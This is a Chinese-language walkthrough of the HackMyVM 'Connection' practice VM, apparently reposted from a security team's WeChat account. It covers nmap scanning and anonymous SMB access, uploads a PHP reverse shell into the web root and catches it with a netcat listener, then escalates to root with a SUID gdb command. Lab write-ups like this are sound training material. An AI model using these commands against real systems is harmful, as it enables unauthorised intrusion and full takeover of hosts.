HackMyVM-Connection

admin 2024年12月28日13:17:03评论5 views字数 1314阅读4分22秒阅读模式

本次使用靶机来自HackMyVM 它是一个共享易受攻击的VM 和知识的平台,给想要学习和测试他们的黑客技能的人。下载后使用

VritualBox导入即可使用。

难度:简单

信息收集
主机发现

要攻击任何机器,我们需要知道IP地址。接下来我们使用netdiscover进行扫描

# netdiscover -i eth0 -r 192.168.1.0/24

HackMyVM-Connection

目标地址:192.168.1.112

确认IP地址后,我们需要用到最流行的端口扫描工具nmap来扫描VM枚举机器上的开放端口

# nmap -sV -sC -p- 192.168.1.112

HackMyVM-Connection

从上面的结果我们发现VM上有三个工作端口,运行的端口有SSH(22),HTTP(80),SMB(139/445)。由于我们没有SSH的凭证,我们先从HTTP服务开始入手。

HackMyVM-Connection

好吧!从浏览器打开也没有发现什么有用的信息。那就使用路径扫描器dirsearch试一试。

HackMyVM-Connection

额  只有index.html一个网页。

现在只剩下SMB(139/445)端口,不出意外的话,我们的切入点在这里。

Sambe

我们先尝试一下是否有允许空会话的共享。

# smbclient -L ///192.168.1.112//

HackMyVM-Connection

呕吼,一共有三份,我们接下来列出“share”文件夹的内容

HackMyVM-Connection

我们看到在“share”里面有一个名为“html”的文件夹内有index.html。这个表明了是web服务器的根文件夹。所以我们将通过Samba上传一个反向shell并通过web访问它,我们准备一下。

上传反弹shell

# cp /usr/share/webshells/php/php-reverse-shell.php /home/franci4/HackMyVM/Connection

修改shell的名字

mv php-reverse-shell.php sshell.php

修改IP地址和端口

# vim  sshell.php

HackMyVM-Connection

配置好脚本后,通过samba服务上传到“html”文件夹。

# put sshell.php

HackMyVM-Connection

上传成功,我们开启监听并访问上传地址

# nc -nlvp 1234

HackMyVM-Connection

HackMyVM-Connection

当执行恶意PHP时,在终端接受到与netcat的连接,获得对系统的访问权限。

我们尝试找一下有没有其他的文件。

HackMyVM-Connection

很不错我们找到了一个users-flag,还有一个root-flag需要找到

权限提升

访问是通过www-data用户实现的,但是有局限性,我们需要升级到权限更高的用户。

我们先检查一下www-data用户的SUID权限

HackMyVM-Connection

发现有权限执行gdb二进制文件,我们从GTFObins网站上搜索到一种使用具有SUID权限的gdb二进制文件夹提升权限的方法,只需执行一下命令,就会获得一个权限终端。

HackMyVM-Connection

# ./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

HackMyVM-Connection

这里手残点到了Enter,可以看到命令执行成功。

获得flag

现在我们找找看有没有root-flag。

HackMyVM-Connection

到这里就结束了,我们已经得到了user-flag&root-flag。

点击下方公众号进行关注

持续更新干货

原文始发于微信公众号(BTS安全团队):HackMyVM-Connection

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月28日13:17:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackMyVM-Connectionhttps://cn-sec.com/archives/1037686.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息